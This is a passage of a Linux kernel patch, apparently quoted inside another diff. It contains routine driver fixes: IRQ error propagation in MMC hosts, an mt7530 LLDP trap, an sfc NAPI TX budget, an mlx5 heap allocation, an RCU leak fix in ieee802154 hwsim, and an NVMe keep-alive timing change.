++		ret = host->irq;
+ 		goto err;
+ 	}
+ 
+diff --git a/drivers/mmc/host/litex_mmc.c b/drivers/mmc/host/litex_mmc.c
+index 39c6707fdfdbc..9af6b0902efe1 100644
+--- a/drivers/mmc/host/litex_mmc.c
++++ b/drivers/mmc/host/litex_mmc.c
+@@ -649,6 +649,7 @@ static struct platform_driver litex_mmc_driver = {
+ 	.driver = {
+ 		.name = "litex-mmc",
+ 		.of_match_table = litex_match,
++		.probe_type = PROBE_PREFER_ASYNCHRONOUS,
+ 	},
+ };
+ module_platform_driver(litex_mmc_driver);
+diff --git a/drivers/mmc/host/meson-gx-mmc.c b/drivers/mmc/host/meson-gx-mmc.c
+index 5c94ad4661ce3..0f39f86bd0c26 100644
+--- a/drivers/mmc/host/meson-gx-mmc.c
++++ b/drivers/mmc/host/meson-gx-mmc.c
+@@ -1007,11 +1007,8 @@ static irqreturn_t meson_mmc_irq(int irq, void *dev_id)
+ 
+ 		if (data && !cmd->error)
+ 			data->bytes_xfered = data->blksz * data->blocks;
+-		if (meson_mmc_bounce_buf_read(data) ||
+-		    meson_mmc_get_next_command(cmd))
+-			ret = IRQ_WAKE_THREAD;
+-		else
+-			ret = IRQ_HANDLED;
++
++		return IRQ_WAKE_THREAD;
+ 	}
+ 
+ out:
+@@ -1023,9 +1020,6 @@ out:
+ 		writel(start, host->regs + SD_EMMC_START);
+ 	}
+ 
+-	if (ret == IRQ_HANDLED)
+-		meson_mmc_request_done(host->mmc, cmd->mrq);
+-
+ 	return ret;
+ }
+ 
+@@ -1233,8 +1227,8 @@ static int meson_mmc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	host->irq = platform_get_irq(pdev, 0);
+-	if (host->irq <= 0) {
+-		ret = -EINVAL;
++	if (host->irq < 0) {
++		ret = host->irq;
+ 		goto free_host;
+ 	}
+ 
+diff --git a/drivers/mmc/host/mmci.c b/drivers/mmc/host/mmci.c
+index b9e5dfe74e5c7..1c326e4307f4a 100644
+--- a/drivers/mmc/host/mmci.c
++++ b/drivers/mmc/host/mmci.c
+@@ -1735,7 +1735,8 @@ static void mmci_set_max_busy_timeout(struct mmc_host *mmc)
+ 		return;
+ 
+ 	if (host->variant->busy_timeout && mmc->actual_clock)
+-		max_busy_timeout = ~0UL / (mmc->actual_clock / MSEC_PER_SEC);
++		max_busy_timeout = U32_MAX / DIV_ROUND_UP(mmc->actual_clock,
++							  MSEC_PER_SEC);
+ 
+ 	mmc->max_busy_timeout = max_busy_timeout;
+ }
+diff --git a/drivers/mmc/host/mtk-sd.c b/drivers/mmc/host/mtk-sd.c
+index 26bc59b5a7ccf..425efb3fba048 100644
+--- a/drivers/mmc/host/mtk-sd.c
++++ b/drivers/mmc/host/mtk-sd.c
+@@ -2658,7 +2658,7 @@ static int msdc_drv_probe(struct platform_device *pdev)
+ 
+ 	host->irq = platform_get_irq(pdev, 0);
+ 	if (host->irq < 0) {
+-		ret = -EINVAL;
++		ret = host->irq;
+ 		goto host_free;
+ 	}
+ 
+diff --git a/drivers/mmc/host/mvsdio.c b/drivers/mmc/host/mvsdio.c
+index 629efbe639c4f..b4f6a0a2fcb51 100644
+--- a/drivers/mmc/host/mvsdio.c
++++ b/drivers/mmc/host/mvsdio.c
+@@ -704,7 +704,7 @@ static int mvsd_probe(struct platform_device *pdev)
+ 	}
+ 	irq = platform_get_irq(pdev, 0);
+ 	if (irq < 0)
+-		return -ENXIO;
++		return irq;
+ 
+ 	mmc = mmc_alloc_host(sizeof(struct mvsd_host), &pdev->dev);
+ 	if (!mmc) {
+diff --git a/drivers/mmc/host/omap.c b/drivers/mmc/host/omap.c
+index 57d39283924da..cc2213ea324f1 100644
+--- a/drivers/mmc/host/omap.c
++++ b/drivers/mmc/host/omap.c
+@@ -1343,7 +1343,7 @@ static int mmc_omap_probe(struct platform_device *pdev)
+ 
+ 	irq = platform_get_irq(pdev, 0);
+ 	if (irq < 0)
+-		return -ENXIO;
++		return irq;
+ 
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+ 	host->virt_base = devm_ioremap_resource(&pdev->dev, res);
+diff --git a/drivers/mmc/host/omap_hsmmc.c b/drivers/mmc/host/omap_hsmmc.c
+index 4bd7447552055..2db3a16e63c48 100644
+--- a/drivers/mmc/host/omap_hsmmc.c
++++ b/drivers/mmc/host/omap_hsmmc.c
+@@ -1791,9 +1791,11 @@ static int omap_hsmmc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-	irq = platform_get_irq(pdev, 0);
+-	if (res == NULL || irq < 0)
++	if (!res)
+ 		return -ENXIO;
++	irq = platform_get_irq(pdev, 0);
++	if (irq < 0)
++		return irq;
+ 
+ 	base = devm_ioremap_resource(&pdev->dev, res);
+ 	if (IS_ERR(base))
+diff --git a/drivers/mmc/host/owl-mmc.c b/drivers/mmc/host/owl-mmc.c
+index 3dc143b039397..679b8b0b310e5 100644
+--- a/drivers/mmc/host/owl-mmc.c
++++ b/drivers/mmc/host/owl-mmc.c
+@@ -638,7 +638,7 @@ static int owl_mmc_probe(struct platform_device *pdev)
+ 
+ 	owl_host->irq = platform_get_irq(pdev, 0);
+ 	if (owl_host->irq < 0) {
+-		ret = -EINVAL;
++		ret = owl_host->irq;
+ 		goto err_release_channel;
+ 	}
+ 
+diff --git a/drivers/mmc/host/sdhci-acpi.c b/drivers/mmc/host/sdhci-acpi.c
+index 4cca4c90769bc..b917060a258a4 100644
+--- a/drivers/mmc/host/sdhci-acpi.c
++++ b/drivers/mmc/host/sdhci-acpi.c
+@@ -829,7 +829,7 @@ static int sdhci_acpi_probe(struct platform_device *pdev)
+ 	host->ops	= &sdhci_acpi_ops_dflt;
+ 	host->irq	= platform_get_irq(pdev, 0);
+ 	if (host->irq < 0) {
+-		err = -EINVAL;
++		err = host->irq;
+ 		goto err_free;
+ 	}
+ 
+diff --git a/drivers/mmc/host/sdhci-msm.c b/drivers/mmc/host/sdhci-msm.c
+index 3a091a387ecbc..a5ab2af3e5201 100644
+--- a/drivers/mmc/host/sdhci-msm.c
++++ b/drivers/mmc/host/sdhci-msm.c
+@@ -2486,6 +2486,9 @@ static inline void sdhci_msm_get_of_property(struct platform_device *pdev,
+ 		msm_host->ddr_config = DDR_CONFIG_POR_VAL;
+ 
+ 	of_property_read_u32(node, "qcom,dll-config", &msm_host->dll_config);
++
++	if (of_device_is_compatible(node, "qcom,msm8916-sdhci"))
++		host->quirks2 |= SDHCI_QUIRK2_BROKEN_64_BIT_DMA;
+ }
+ 
+ static int sdhci_msm_gcc_reset(struct device *dev, struct sdhci_host *host)
+diff --git a/drivers/mmc/host/sdhci-spear.c b/drivers/mmc/host/sdhci-spear.c
+index d463e2fd5b1a8..c79035727b20b 100644
+--- a/drivers/mmc/host/sdhci-spear.c
++++ b/drivers/mmc/host/sdhci-spear.c
+@@ -65,8 +65,8 @@ static int sdhci_probe(struct platform_device *pdev)
+ 	host->hw_name = "sdhci";
+ 	host->ops = &sdhci_pltfm_ops;
+ 	host->irq = platform_get_irq(pdev, 0);
+-	if (host->irq <= 0) {
+-		ret = -EINVAL;
++	if (host->irq < 0) {
++		ret = host->irq;
+ 		goto err_host;
+ 	}
+ 	host->quirks = SDHCI_QUIRK_BROKEN_ADMA;
+diff --git a/drivers/mmc/host/sh_mmcif.c b/drivers/mmc/host/sh_mmcif.c
+index 0fd4c9d644dd5..5cf53348372a4 100644
+--- a/drivers/mmc/host/sh_mmcif.c
++++ b/drivers/mmc/host/sh_mmcif.c
+@@ -1400,7 +1400,7 @@ static int sh_mmcif_probe(struct platform_device *pdev)
+ 	irq[0] = platform_get_irq(pdev, 0);
+ 	irq[1] = platform_get_irq_optional(pdev, 1);
+ 	if (irq[0] < 0)
+-		return -ENXIO;
++		return irq[0];
+ 
+ 	reg = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(reg))
+diff --git a/drivers/mmc/host/sunxi-mmc.c b/drivers/mmc/host/sunxi-mmc.c
+index 3db9f32d6a7b9..69dcb8805e05f 100644
+--- a/drivers/mmc/host/sunxi-mmc.c
++++ b/drivers/mmc/host/sunxi-mmc.c
+@@ -1350,8 +1350,8 @@ static int sunxi_mmc_resource_request(struct sunxi_mmc_host *host,
+ 		return ret;
+ 
+ 	host->irq = platform_get_irq(pdev, 0);
+-	if (host->irq <= 0) {
+-		ret = -EINVAL;
++	if (host->irq < 0) {
++		ret = host->irq;
+ 		goto error_disable_mmc;
+ 	}
+ 
+diff --git a/drivers/mmc/host/usdhi6rol0.c b/drivers/mmc/host/usdhi6rol0.c
+index 99515be6e5e57..2032e4e1ee68b 100644
+--- a/drivers/mmc/host/usdhi6rol0.c
++++ b/drivers/mmc/host/usdhi6rol0.c
+@@ -1757,8 +1757,10 @@ static int usdhi6_probe(struct platform_device *pdev)
+ 	irq_cd = platform_get_irq_byname(pdev, "card detect");
+ 	irq_sd = platform_get_irq_byname(pdev, "data");
+ 	irq_sdio = platform_get_irq_byname(pdev, "SDIO");
+-	if (irq_sd < 0 || irq_sdio < 0)
+-		return -ENODEV;
++	if (irq_sd < 0)
++		return irq_sd;
++	if (irq_sdio < 0)
++		return irq_sdio;
+ 
+ 	mmc = mmc_alloc_host(sizeof(struct usdhi6_host), dev);
+ 	if (!mmc)
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 855220c5ce339..51d2ef0dc835c 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -998,6 +998,18 @@ unlock_exit:
+ 	mutex_unlock(&priv->reg_mutex);
+ }
+ 
++static void
++mt753x_trap_frames(struct mt7530_priv *priv)
++{
++	/* Trap BPDUs to the CPU port(s) */
++	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_BPDU_CPU_ONLY);
++
++	/* Trap LLDP frames with :0E MAC DA to the CPU port(s) */
++	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_PORT_FW_MASK,
++		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY));
++}
++
+ static int
+ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ {
+@@ -1020,7 +1032,7 @@ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ 		   UNU_FFP(BIT(port)));
+ 
+ 	/* Set CPU port number */
+-	if (priv->id == ID_MT7621)
++	if (priv->id == ID_MT7530 || priv->id == ID_MT7621)
+ 		mt7530_rmw(priv, MT7530_MFC, CPU_MASK, CPU_EN | CPU_PORT(port));
+ 
+ 	/* CPU port gets connected to all user ports of
+@@ -2219,6 +2231,8 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	priv->p6_interface = PHY_INTERFACE_MODE_NA;
+ 
++	mt753x_trap_frames(priv);
++
+ 	/* Enable and reset MIB counters */
+ 	mt7530_mib_reset(ds);
+ 
+@@ -2325,8 +2339,8 @@ mt7531_setup_common(struct dsa_switch *ds)
+ 			   BIT(cpu_dp->index));
+ 		break;
+ 	}
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
+-		   MT753X_BPDU_CPU_ONLY);
++
++	mt753x_trap_frames(priv);
+ 
+ 	/* Enable and reset MIB counters */
+ 	mt7530_mib_reset(ds);
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index e8d9664353504..9a45663d8b4ef 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -65,6 +65,11 @@ enum mt753x_id {
+ #define MT753X_BPC			0x24
+ #define  MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)
+ 
++/* Register for :03 and :0E MAC DA frame control */
++#define MT753X_RGAC2			0x2c
++#define  MT753X_R0E_PORT_FW_MASK	GENMASK(18, 16)
++#define  MT753X_R0E_PORT_FW(x)		FIELD_PREP(MT753X_R0E_PORT_FW_MASK, x)
++
+ enum mt753x_bpdu_port_fw {
+ 	MT753X_BPDU_FOLLOW_MFC,
+ 	MT753X_BPDU_CPU_EXCLUDE = 4,
+diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c
+index a92a747615466..5d39df8452653 100644
+--- a/drivers/net/ethernet/emulex/benet/be_main.c
++++ b/drivers/net/ethernet/emulex/benet/be_main.c
+@@ -1136,8 +1136,8 @@ static struct sk_buff *be_lancer_xmit_workarounds(struct be_adapter *adapter,
+ 	eth_hdr_len = ntohs(skb->protocol) == ETH_P_8021Q ?
+ 						VLAN_ETH_HLEN : ETH_HLEN;
+ 	if (skb->len <= 60 &&
+-	    (lancer_chip(adapter) || skb_vlan_tag_present(skb)) &&
+-	    is_ipv4_pkt(skb)) {
++	    (lancer_chip(adapter) || BE3_chip(adapter) ||
++	     skb_vlan_tag_present(skb)) && is_ipv4_pkt(skb)) {
+ 		ip = (struct iphdr *)ip_hdr(skb);
+ 		pskb_trim(skb, eth_hdr_len + ntohs(ip->tot_len));
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
+index b1dfad274a39e..a3e7602b044e5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
+@@ -1200,9 +1200,13 @@ dr_action_create_reformat_action(struct mlx5dr_domain *dmn,
+ 	}
+ 	case DR_ACTION_TYP_TNL_L3_TO_L2:
+ 	{
+-		u8 hw_actions[ACTION_CACHE_LINE_SIZE] = {};
++		u8 *hw_actions;
+ 		int ret;
+ 
++		hw_actions = kzalloc(ACTION_CACHE_LINE_SIZE, GFP_KERNEL);
++		if (!hw_actions)
++			return -ENOMEM;
++
+ 		ret = mlx5dr_ste_set_action_decap_l3_list(dmn->ste_ctx,
+ 							  data, data_sz,
+ 							  hw_actions,
+@@ -1210,6 +1214,7 @@ dr_action_create_reformat_action(struct mlx5dr_domain *dmn,
+ 							  &action->rewrite->num_of_actions);
+ 		if (ret) {
+ 			mlx5dr_dbg(dmn, "Failed creating decap l3 action list\n");
++			kfree(hw_actions);
+ 			return ret;
+ 		}
+ 
+@@ -1217,6 +1222,7 @@ dr_action_create_reformat_action(struct mlx5dr_domain *dmn,
+ 								DR_CHUNK_SIZE_8);
+ 		if (!action->rewrite->chunk) {
+ 			mlx5dr_dbg(dmn, "Failed allocating modify header chunk\n");
++			kfree(hw_actions);
+ 			return -ENOMEM;
+ 		}
+ 
+@@ -1230,6 +1236,7 @@ dr_action_create_reformat_action(struct mlx5dr_domain *dmn,
+ 		if (ret) {
+ 			mlx5dr_dbg(dmn, "Writing decap l3 actions to ICM failed\n");
+ 			mlx5dr_icm_free_chunk(action->rewrite->chunk);
++			kfree(hw_actions);
+ 			return ret;
+ 		}
+ 		return 0;
+diff --git a/drivers/net/ethernet/qualcomm/qca_spi.c b/drivers/net/ethernet/qualcomm/qca_spi.c
+index c865a4be05eec..4a1b94e5a8ea9 100644
+--- a/drivers/net/ethernet/qualcomm/qca_spi.c
++++ b/drivers/net/ethernet/qualcomm/qca_spi.c
+@@ -582,8 +582,7 @@ qcaspi_spi_thread(void *data)
+ 	while (!kthread_should_stop()) {
+ 		set_current_state(TASK_INTERRUPTIBLE);
+ 		if ((qca->intr_req == qca->intr_svc) &&
+-		    (qca->txr.skb[qca->txr.head] == NULL) &&
+-		    (qca->sync == QCASPI_SYNC_READY))
++		    !qca->txr.skb[qca->txr.head])
+ 			schedule();
+ 
+ 		set_current_state(TASK_RUNNING);
+diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c
+index d30459dbfe8f8..b63e47af63655 100644
+--- a/drivers/net/ethernet/sfc/ef10.c
++++ b/drivers/net/ethernet/sfc/ef10.c
+@@ -2950,7 +2950,7 @@ static u32 efx_ef10_extract_event_ts(efx_qword_t *event)
+ 	return tstamp;
+ }
+ 
+-static void
++static int
+ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ {
+ 	struct efx_nic *efx = channel->efx;
+@@ -2958,13 +2958,14 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 	unsigned int tx_ev_desc_ptr;
+ 	unsigned int tx_ev_q_label;
+ 	unsigned int tx_ev_type;
++	int work_done;
+ 	u64 ts_part;
+ 
+ 	if (unlikely(READ_ONCE(efx->reset_pending)))
+-		return;
++		return 0;
+ 
+ 	if (unlikely(EFX_QWORD_FIELD(*event, ESF_DZ_TX_DROP_EVENT)))
+-		return;
++		return 0;
+ 
+ 	/* Get the transmit queue */
+ 	tx_ev_q_label = EFX_QWORD_FIELD(*event, ESF_DZ_TX_QLABEL);
+@@ -2973,8 +2974,7 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 	if (!tx_queue->timestamping) {
+ 		/* Transmit completion */
+ 		tx_ev_desc_ptr = EFX_QWORD_FIELD(*event, ESF_DZ_TX_DESCR_INDX);
+-		efx_xmit_done(tx_queue, tx_ev_desc_ptr & tx_queue->ptr_mask);
+-		return;
++		return efx_xmit_done(tx_queue, tx_ev_desc_ptr & tx_queue->ptr_mask);
+ 	}
+ 
+ 	/* Transmit timestamps are only available for 8XXX series. They result
+@@ -3000,6 +3000,7 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 	 * fields in the event.
+ 	 */
+ 	tx_ev_type = EFX_QWORD_FIELD(*event, ESF_EZ_TX_SOFT1);
++	work_done = 0;
+ 
+ 	switch (tx_ev_type) {
+ 	case TX_TIMESTAMP_EVENT_TX_EV_COMPLETION:
+@@ -3016,6 +3017,7 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 		tx_queue->completed_timestamp_major = ts_part;
+ 
+ 		efx_xmit_done_single(tx_queue);
++		work_done = 1;
+ 		break;
+ 
+ 	default:
+@@ -3026,6 +3028,8 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 			  EFX_QWORD_VAL(*event));
+ 		break;
+ 	}
++
++	return work_done;
+ }
+ 
+ static void
+@@ -3081,13 +3085,16 @@ static void efx_ef10_handle_driver_generated_event(struct efx_channel *channel,
+ 	}
+ }
+ 
++#define EFX_NAPI_MAX_TX 512
++
+ static int efx_ef10_ev_process(struct efx_channel *channel, int quota)
+ {
+ 	struct efx_nic *efx = channel->efx;
+ 	efx_qword_t event, *p_event;
+ 	unsigned int read_ptr;
+-	int ev_code;
++	int spent_tx = 0;
+ 	int spent = 0;
++	int ev_code;
+ 
+ 	if (quota <= 0)
+ 		return spent;
+@@ -3126,7 +3133,11 @@ static int efx_ef10_ev_process(struct efx_channel *channel, int quota)
+ 			}
+ 			break;
+ 		case ESE_DZ_EV_CODE_TX_EV:
+-			efx_ef10_handle_tx_event(channel, &event);
++			spent_tx += efx_ef10_handle_tx_event(channel, &event);
++			if (spent_tx >= EFX_NAPI_MAX_TX) {
++				spent = quota;
++				goto out;
++			}
+ 			break;
+ 		case ESE_DZ_EV_CODE_DRIVER_EV:
+ 			efx_ef10_handle_driver_event(channel, &event);
+diff --git a/drivers/net/ethernet/sfc/ef100_nic.c b/drivers/net/ethernet/sfc/ef100_nic.c
+index ad686c671ab89..fa1f7039a8e28 100644
+--- a/drivers/net/ethernet/sfc/ef100_nic.c
++++ b/drivers/net/ethernet/sfc/ef100_nic.c
+@@ -242,6 +242,8 @@ static void ef100_ev_read_ack(struct efx_channel *channel)
+ 		   efx_reg(channel->efx, ER_GZ_EVQ_INT_PRIME));
+ }
+ 
++#define EFX_NAPI_MAX_TX 512
++
+ static int ef100_ev_process(struct efx_channel *channel, int quota)
+ {
+ 	struct efx_nic *efx = channel->efx;
+@@ -249,6 +251,7 @@ static int ef100_ev_process(struct efx_channel *channel, int quota)
+ 	bool evq_phase, old_evq_phase;
+ 	unsigned int read_ptr;
+ 	efx_qword_t *p_event;
++	int spent_tx = 0;
+ 	int spent = 0;
+ 	bool ev_phase;
+ 	int ev_type;
+@@ -284,7 +287,9 @@ static int ef100_ev_process(struct efx_channel *channel, int quota)
+ 			efx_mcdi_process_event(channel, p_event);
+ 			break;
+ 		case ESE_GZ_EF100_EV_TX_COMPLETION:
+-			ef100_ev_tx(channel, p_event);
++			spent_tx += ef100_ev_tx(channel, p_event);
++			if (spent_tx >= EFX_NAPI_MAX_TX)
++				spent = quota;
+ 			break;
+ 		case ESE_GZ_EF100_EV_DRIVER:
+ 			netif_info(efx, drv, efx->net_dev,
+diff --git a/drivers/net/ethernet/sfc/ef100_tx.c b/drivers/net/ethernet/sfc/ef100_tx.c
+index 29ffaf35559d6..849e5555bd128 100644
+--- a/drivers/net/ethernet/sfc/ef100_tx.c
++++ b/drivers/net/ethernet/sfc/ef100_tx.c
+@@ -346,7 +346,7 @@ void ef100_tx_write(struct efx_tx_queue *tx_queue)
+ 	ef100_tx_push_buffers(tx_queue);
+ }
+ 
+-void ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event)
++int ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event)
+ {
+ 	unsigned int tx_done =
+ 		EFX_QWORD_FIELD(*p_event, ESF_GZ_EV_TXCMPL_NUM_DESC);
+@@ -357,7 +357,7 @@ void ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event)
+ 	unsigned int tx_index = (tx_queue->read_count + tx_done - 1) &
+ 				tx_queue->ptr_mask;
+ 
+-	efx_xmit_done(tx_queue, tx_index);
++	return efx_xmit_done(tx_queue, tx_index);
+ }
+ 
+ /* Add a socket buffer to a TX queue
+diff --git a/drivers/net/ethernet/sfc/ef100_tx.h b/drivers/net/ethernet/sfc/ef100_tx.h
+index e9e11540fcdea..d9a0819c5a72c 100644
+--- a/drivers/net/ethernet/sfc/ef100_tx.h
++++ b/drivers/net/ethernet/sfc/ef100_tx.h
+@@ -20,7 +20,7 @@ void ef100_tx_init(struct efx_tx_queue *tx_queue);
+ void ef100_tx_write(struct efx_tx_queue *tx_queue);
+ unsigned int ef100_tx_max_skb_descs(struct efx_nic *efx);
+ 
+-void ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event);
++int ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event);
+ 
+ netdev_tx_t ef100_enqueue_skb(struct efx_tx_queue *tx_queue, struct sk_buff *skb);
+ int __ef100_enqueue_skb(struct efx_tx_queue *tx_queue, struct sk_buff *skb,
+diff --git a/drivers/net/ethernet/sfc/tx_common.c b/drivers/net/ethernet/sfc/tx_common.c
+index 67e789b96c437..755aa92bf8236 100644
+--- a/drivers/net/ethernet/sfc/tx_common.c
++++ b/drivers/net/ethernet/sfc/tx_common.c
+@@ -249,7 +249,7 @@ void efx_xmit_done_check_empty(struct efx_tx_queue *tx_queue)
+ 	}
+ }
+ 
+-void efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index)
++int efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index)
+ {
+ 	unsigned int fill_level, pkts_compl = 0, bytes_compl = 0;
+ 	unsigned int efv_pkts_compl = 0;
+@@ -279,6 +279,8 @@ void efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index)
+ 	}
+ 
+ 	efx_xmit_done_check_empty(tx_queue);
++
++	return pkts_compl + efv_pkts_compl;
+ }
+ 
+ /* Remove buffers put into a tx_queue for the current packet.
+diff --git a/drivers/net/ethernet/sfc/tx_common.h b/drivers/net/ethernet/sfc/tx_common.h
+index d87aecbc7bf1a..1e9f42938aac9 100644
+--- a/drivers/net/ethernet/sfc/tx_common.h
++++ b/drivers/net/ethernet/sfc/tx_common.h
+@@ -28,7 +28,7 @@ static inline bool efx_tx_buffer_in_use(struct efx_tx_buffer *buffer)
+ }
+ 
+ void efx_xmit_done_check_empty(struct efx_tx_queue *tx_queue);
+-void efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index);
++int efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index);
+ 
+ void efx_enqueue_unwind(struct efx_tx_queue *tx_queue,
+ 			unsigned int insert_count);
+diff --git a/drivers/net/ieee802154/mac802154_hwsim.c b/drivers/net/ieee802154/mac802154_hwsim.c
+index 2f0544dd7c2ad..9b3da61840a8f 100644
+--- a/drivers/net/ieee802154/mac802154_hwsim.c
++++ b/drivers/net/ieee802154/mac802154_hwsim.c
+@@ -522,7 +522,7 @@ static int hwsim_del_edge_nl(struct sk_buff *msg, struct genl_info *info)
+ static int hwsim_set_edge_lqi(struct sk_buff *msg, struct genl_info *info)
+ {
+ 	struct nlattr *edge_attrs[MAC802154_HWSIM_EDGE_ATTR_MAX + 1];
+-	struct hwsim_edge_info *einfo;
++	struct hwsim_edge_info *einfo, *einfo_old;
+ 	struct hwsim_phy *phy_v0;
+ 	struct hwsim_edge *e;
+ 	u32 v0, v1;
+@@ -560,8 +560,10 @@ static int hwsim_set_edge_lqi(struct sk_buff *msg, struct genl_info *info)
+ 	list_for_each_entry_rcu(e, &phy_v0->edges, list) {
+ 		if (e->endpoint->idx == v1) {
+ 			einfo->lqi = lqi;
+-			rcu_assign_pointer(e->info, einfo);
++			einfo_old = rcu_replace_pointer(e->info, einfo,
++							lockdep_is_held(&hwsim_phys_lock));
+ 			rcu_read_unlock();
++			kfree_rcu(einfo_old, rcu);
+ 			mutex_unlock(&hwsim_phys_lock);
+ 			return 0;
+ 		}
+diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c
+index 14990f8462ae3..f7436191fa807 100644
+--- a/drivers/net/phy/dp83867.c
++++ b/drivers/net/phy/dp83867.c
+@@ -905,7 +905,7 @@ static int dp83867_phy_reset(struct phy_device *phydev)
+ {
+ 	int err;
+ 
+-	err = phy_write(phydev, DP83867_CTRL, DP83867_SW_RESTART);
++	err = phy_write(phydev, DP83867_CTRL, DP83867_SW_RESET);
+ 	if (err < 0)
+ 		return err;
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 03e8234d03520..f6872b2a0d9d0 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -547,6 +547,8 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x54F0, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
+ 	IWL_DEV_INFO(0x7A70, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
+ 	IWL_DEV_INFO(0x7A70, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
++	IWL_DEV_INFO(0x7AF0, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
++	IWL_DEV_INFO(0x7AF0, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
+ 
+ 	IWL_DEV_INFO(0x271C, 0x0214, iwl9260_2ac_cfg, iwl9260_1_name),
+ 	IWL_DEV_INFO(0x7E40, 0x1691, iwl_cfg_ma_a0_gf4_a0, iwl_ax411_killer_1690s_name),
+diff --git a/drivers/nfc/nfcsim.c b/drivers/nfc/nfcsim.c
+index 85bf8d586c707..0f6befe8be1e2 100644
+--- a/drivers/nfc/nfcsim.c
++++ b/drivers/nfc/nfcsim.c
+@@ -336,10 +336,6 @@ static struct dentry *nfcsim_debugfs_root;
+ static void nfcsim_debugfs_init(void)
+ {
+ 	nfcsim_debugfs_root = debugfs_create_dir("nfcsim", NULL);
+-
+-	if (!nfcsim_debugfs_root)
+-		pr_err("Could not create debugfs entry\n");
+-
+ }
+ 
+ static void nfcsim_debugfs_remove(void)
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 2e22c78991ccf..a7d9b5b42b388 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -395,7 +395,16 @@ void nvme_complete_rq(struct request *req)
+ 	trace_nvme_complete_rq(req);
+ 	nvme_cleanup_cmd(req);
+ 
+-	if (ctrl->kas)
++	/*
++	 * Completions of long-running commands should not be able to
++	 * defer sending of periodic keep alives, since the controller
++	 * may have completed processing such commands a long time ago
++	 * (arbitrarily close to command submission time).
++	 * req->deadline - req->timeout is the command submission time
++	 * in jiffies.
++	 */
++	if (ctrl->kas &&
++	    req->deadline - req->timeout >= ctrl->ka_last_check_time)
+ 		ctrl->comp_seen = true;
+ 
+ 	switch (nvme_decide_disposition(req)) {
+@@ -1198,9 +1207,25 @@ EXPORT_SYMBOL_NS_GPL(nvme_execute_passthru_rq, NVME_TARGET_PASSTHRU);
+  *   The host should send Keep Alive commands at half of the Keep Alive Timeout
+  *   accounting for transport roundtrip times [..].
+  */
++static unsigned long nvme_keep_alive_work_period(struct nvme_ctrl *ctrl)
++{
++	unsigned long delay = ctrl->kato * HZ / 2;
++
++	/*
++	 * When using Traffic Based Keep Alive, we need to run
++	 * nvme_keep_alive_work at twice the normal frequency, as one
++	 * command completion can postpone sending a keep alive command
++	 * by up to twice the delay between runs.
++	 */
++	if (ctrl->ctratt & NVME_CTRL_ATTR_TBKAS)
++		delay /= 2;
++	return delay;
++}
++
+ static void nvme_queue_keep_alive_work(struct nvme_ctrl *ctrl)
+ {
+-	queue_delayed_work(nvme_wq, &ctrl->ka_work, ctrl->kato * HZ / 2);
++	queue_delayed_work(nvme_wq, &ctrl->ka_work,
++			   nvme_keep_alive_work_period(ctrl));
+ }
+ 
